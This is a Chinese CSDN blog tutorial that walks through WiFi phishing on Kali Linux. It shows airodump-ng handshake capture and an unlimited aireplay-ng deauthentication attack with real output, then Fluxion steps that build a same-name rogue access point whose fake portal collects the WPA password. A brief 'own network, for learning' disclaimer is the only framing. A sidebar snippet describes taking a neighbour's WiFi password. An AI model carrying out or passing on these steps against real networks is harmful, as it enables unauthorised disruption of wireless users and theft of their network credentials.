kali利用fluxion无线网络钓鱼

最新推荐文章于 2024-04-28 19:27:10 发布
最新推荐文章于 2024-04-28 19:27:10 发布
阅读量1.2k 收藏 4
点赞数
文章标签: 网络 linux 服务器
原文链接:https://blog.csdn.net/u012781697/article/details/108451822?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522166766146516782425666272%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=166766146516782425666272&biz_id=0&utm_med
版权

看了网上所有关于fluxion的钓鱼使用教程都感觉不太全,本文本是整理为了自己复习学习,初学有问题还请大佬指示。

测试硬件:
笔记本电脑

无限外置网卡一张

(两张网卡是必须的)

软件:
fluxion

airmon

查看网卡
airmon-ng


选择网卡
我用的是wlan0(wlan0为电脑自带网卡)

启动网卡监听
airmon-ng start wlan0


查看网卡监听信息
airodump-ng wlan0mon


选择网络信息
(图片不是本次抓包的截图)

BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                     
                                                                                                                                     
 E0:40:07:09:50:A8   -1        0        0    0   1   -1                    <length:  0>                                              
 50:D2:F5:FE:FA:B1  -125       11        0    0   5  130   WPA2 CCMP   PSK  Xiaomi_FAB0                                              
 F6:D5:55:4E:09:6B  -58        9       12    0   3  360   WPA2 CCMP   PSK  OnePlus 7 pro                    
 

获取握手包
airodump-ng -c (信道CH) --bssid (bssid) -w /root(握手包存放目录) wlan0mon
参数:

-c 指定频道号

--bssid 指定路由器bssid

-w 指定抓取的握手包存储路径
 
 最后是指定网卡接口

CH  3 ][ Elapsed: 2 mins ][ 2020-09-08 00:54 ]                                              
                                                                                                                                     
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                 
                                                                                                                                     
 F6:D5:55:4E:09:6B   -3 100      841     2360    5   3  360   WPA2 CCMP   PSK  OPPO K5                                               
                                                                                                                                     
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                   
                                                                                                                                     
 F6:D5:55:4E:09:6B  26:84:7E:83:93:77  -29    0e- 1e     0    16562  EAPOL  OPPO K5                                                   F6:D5:55:4E:09:6B  4C:32:75:94:C5:15  -53    0e-24e  1616      572                                       
                           

     

开始攻击来获取握手报
新打开一个Shell ,之前的不要关。

aireplay-ng -0 0(攻击次数  0为无限次) -a BSSID -c (使用设备MAC地址 STATION ) wlan0mon

参数解释:

-0 攻击次数(-0 2 即攻击2次,-0 0为无限次数)

-a 指定无线路由器BSSID

-c 指定强制断开的设备

 最后是指定网卡接口

root@yuan:~# aireplay-ng -0 0 -a 50:D2:F5:FE:FA:B1 -c 38:6E:A2:5C:04:EC wlan0mon
00:15:28  Waiting for beacon frame (BSSID: 50:D2:F5:FE:FA:B1) on channel 5
00:15:29  Sending 64 directed DeAuth (code 7). STMAC: [38:6E:A2:5C:04:EC] [10|65 ACKs]
00:15:29  Sending 64 directed DeAuth (code 7). STMAC: [38:6E:A2:5C:04:EC] [10|63 ACKs]
00:15:30  Sending 64 directed DeAuth (code 7). STMAC: [38:6E:A2:5C:04:EC] [ 5|61 ACKs]


等待[ WPA handshake: F6:D5:55:4E:09:6B      出现证明握手包获取完成

在保存目录里.cap结尾的为握手包

找到fluxion目录
./fluxion.sh
运行fluxion


选择中文
(有人说中文有bug,如果英语好可以选择英语) 

选择建立 AP (建立一个同名网络)
 

 选择你想要搜索网络的网卡
 

 选择信道(我一般都是所有信道)
 

 扫描到你之前抓包的网络后按Ctrl+C结束扫描,填网络对应的序号回车


 选择干扰你要钓鱼网站的网卡
 

 接着无脑选择
 选择3 流氓AP - hostapd
 到这里最开始抓到握手包的用处来了

把你刚才抓到的握手包后缀为.cap的文件目录填上(直接拖拽最快)

回车

 选择cowpatty验证
 

 选择创建SSL证书


 选择断开原网络


 选择自己制作的钓鱼页面


 出现这个页面证明钓鱼WIFI开始工作了,扫描WIFI原网络已经无法连接了只能自动连接我们自己伪造的同名AP

 手机连接成功后自动弹窗输入密码后进行验证,右上角的框会有提示,生成一个文件里边有密码和网络信息

 最后成果
 

本次测试钓鱼网络均为自己的网络,本文章仅供学习使用。
————————————————
版权声明:本文为CSDN博主「EVEB」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/u012781697/article/details/108451822

wouderw
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用fluxion进行WIFI钓鱼攻击的实验
weixin_39880719的博客
05-14 2240
利用fluxion进行WIFI钓鱼攻击的实验。
实战-Fluxion与wifi热点伪造、钓鱼、wifi破解
Hungchuiho的博客
08-28 8681
今天周末遇到了断网,听说是修路挖到了电缆,作为难得的周末没网是不能接受的,这时我盯上了邻居家的WiFi,奈何又没密码,只能动手白嫖一下了。 现在的家用路由器支持WiFi一般是wpa/wpa2,没有连接密码我们只能做Deauthentication,即解除认证攻击(aireplay-ng -0),此攻击会给已连接上接入点的用户发送断开包(导致用户和接入点断开连接)。简单说就是对wifi进行ddos,但是断网并不是我想要的,我的目的是获取到邻居的WiFi密码。所以就是如何获得wifi密码。 一、 wifi万能钥
使用Fluxion实现WiFi钓鱼
CrotZZ的博客
01-07 1万+
工具:无线网卡(可监听)、Fluxion、路由器(演示中的为自家学校安全系实验室) Fluxion介绍: Fluxion是从一个叫做Lindset的高级社会工程攻击演变而来,以欺骗无经验的用户泄露网络的密码的重写攻击。其唯一一个通过使用WPA握手功能来控制登录页面的行为和控制整个脚本的行为的工具。它会阻塞原始网络并创建一个具有相同名称的克隆网络,引起断开连接后的用户加入。 并且提供了一个虚假的路由器重新启动或加载固件,并请求网络密码继续登录的页面。该工具通过捕获握手包来获得输入的密码,使用Aircrack-
kali新版本(2023)fluxion钓鱼部署报错
最新发布
2301_76206334的博客
04-28 881
7.因为kali新版本的缘故 当你安装完pyrit模块后 使用apt-get命令 老是会弹出模块缺失 很影响使用 所以建议在做完这个实验之后 可以使用命令吧这个模块卸载了 然后就可以正常使用了。6.接着我们遇到一个麻烦的模块 下载不了是因为 官方源把他俩删了 所以只能通过 别的渠道下载。因为我的是2023版的kali 所以我少的是dhcpd和pyrit模块。1.执行这个命令 这是官方源 可以直接在kali命令行安装。2.我是在桌面执行的命令 所以我们查看。3.然后我们进行下一步操作。
【安全牛学习笔记】Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令
weixin_34159110的博客
09-06 1604
持久加密USB安装-1LUKS: linux UNified Key Setup 磁盘分区加密规范 不依赖于操作系统的磁盘级加密 Windows——DoxBox 后端:dm-crypt 前端:cryptsetup 微软的bitlocker将镜像刻录到U盘 dd if=kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=1Mroot...
实例二——Fluxion-钓鱼破解WiFi笔记( 2.4GHz网络
weixin_42345596的博客
06-27 1万+
Fluxion-钓鱼破解WiFi( 2.4GHz网络) 1.安装fluxion 解压安装包,可以看见桌面上出现了fluxion-master,进入之后运行./fluxion.sh -i安装依赖包; 安装完成所有的依赖包 这里选17中文模式 然后选择1对2.4GHz进行抓包 可以看到和airodump-ng一样的功能,这里也是按两下q退出,这里带颜色说明有客户端连接,没带颜色说明没有客户端连接 开始钓鱼 选择25进行钓鱼 选择2进行跳过,如果这里选择完出现 恢复攻击 重置攻击 这里一定选择重置
Kail Linux fluxion WiFi破解
随风的博客
08-06 6885
系统:Kail Linux步骤一: git上找到 fluxion 进行clone。 进入fluxion 目录 运行 ./fluxion.sh 如何发现有没有安装完的插件 进入install 中 运行./install 安装 安装完成之后如下图: 步骤二: 如上图这时候我们需要选择语言,我选择的是1-English:步骤三: 这时候就开始选择信道我选择1: 步骤四: 选择之后会自动扫描
Kali Linux无线网络渗透测kali安装教程
11-06
通过这些实践,你可以学习到如何识别和利用无线网络的潜在弱点,从而提高网络安全防护能力。 总之,Kali Linux无线网络渗透测试教程旨在帮助新手理解无线网络安全的脆弱性,并掌握渗透测试的基本技能。无论是对个人...
Kali Linux无线网络渗透测试教程
12-25
Kali Linux无线网络渗透测试教程
Kali-Linux无线网络渗透测试详解
06-22
Kali Linux无线网络渗透测试详解》是国内第一本无线网络安全渗透测试图书。本书基于Kali Linux操作系统,由浅入深,全面而系统地介绍了无线网络渗透技术。本书针对不同的加密方式的工作原理及存在的漏洞进行了详细...
让 WSL2 中的 Kali 虚拟机使用无线网卡
01-06
让 WSL2 中的 Kali 虚拟机使用无线网卡为什么有这个项目改造 Kali,安装超级工具集WSL2 的改造思路编译内核代码并替换内核编译 USB/IP 工具在 Kali 中挂载无线网卡在 Windows 中提供 USB/IP 服务在 Kali 中启动 USB/...
关于fluxion自己的心得体验欢迎指导
qqqqqqqwea的博客
04-26 7508
首先转到fluxion的主目录,打开窗口。输入 :“ ./fluxion.sh ” ,进行软启动。 第二步:选择语言最新版的17是中文选项(既然有那么我们就选它) 第三步:选择攻击方式:根据自己需求选择 第四步:选择要扫描的信道号(我自己用的路由器是2.4和5G的,所以我选择3) 第五步:确定自己要攻击的对象(我选择的是自己的2.4G信号,渗透测试需谨慎) 第六步:找到自己需求的对象......
基于fluxion 6.9 钓鱼wifi
flynnsin
01-28 4881
本文章仅用来学习,切勿用于违法乱纪,出现问题后果自负。
基于Fluxion实现钓鱼AP的搭建
LYKymy的博客
04-01 6374
从Github上下载Fluxion git clone https://www.github.com/FluxionNetwork/fluxion.git 进入Fluxion目录 cd fluxion 运行自动安装文件 ./fluxion.sh 选择语言 选择攻击方式:选择1,从而实现创建一个同名的AP来欺骗用户 选择哪个无线网卡来搜索AP 选择要扫描的信道 选择要...
kali使用Fluxion钓鱼WiFi
weixin_30384031的博客
03-09 1494
先介绍一下这个软件 这个软件是一个可以生成一个钓鱼WiFi的软件,可以伪装成一个正常的WiFi,但是是没有密码的,但是其他信息都是一样的,一旦开启这个攻击,正常的那个AP就无法正常连接,只能连到这个伪造出来的WiFi,然后会自动弹出一个登陆框,提示WiFi有问题,要求输入WiFi的密码,然后输入的WiFi密码就会被监听到,从而获取到对方的WiFi密码 软件的安装后面的文章会详细讲,这里主要讲攻击 ...
全网最详细用kali linux上的fluxion搭建钓鱼wifi获取wifi密码
热门推荐
forever0heart的博客
03-21 2万+
Kali linux系统用fluxion创建钓鱼wifi获取wifi密码 一、准备 1.RT3070芯片的无线网卡 注意网卡插上后,要和虚拟机连接 2.VMware Workstation Pro VMware Workstation Pro下载 3.kali linux系统 https://www.kali.org/downloads/kali官网下载地址 4.fluxion 进入kali linux安装fluxion 下载fluxion git clone https://github.com/Fl
新手上路 渗透学习(三)
weixin_44323734的博客
06-15 220
可能会看见这些提示,意思就是缺少相关的支撑组件包,可以使用./fluxion.sh -i 尝试自动安装,如果还是不行则需要自己更换源去一一尝试安装。用kali自带的工具暴力破解密码 (我这里以-03.cap文件举例,使用的密码字典是kali自带的rockyou.txt。下载完成后,在fluxion文件夹内使用命令./fluxion.sh 尝试运行。进入kali拿到Root权限后,使用airmon-ng命令,查看移动网卡状态。安装完成后,使用./fluxion.sh启动fluxion
使用fluxion实现WiFi钓鱼
2301_80128805的博客
03-20 2094
本篇文章主要讲了如何用fluxion进行钓鱼,破解wifi密码。
kali安装fluxion
07-25
要在Kali Linux上安装Fluxion,你可以按照以下...请注意,Fluxion是一个用于无线网络渗透测试的工具,仅在合法的授权和测试范围内使用。滥用这个工具可能违反法律法规,因此请确保遵守当地法律并获得授权才能使用它。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值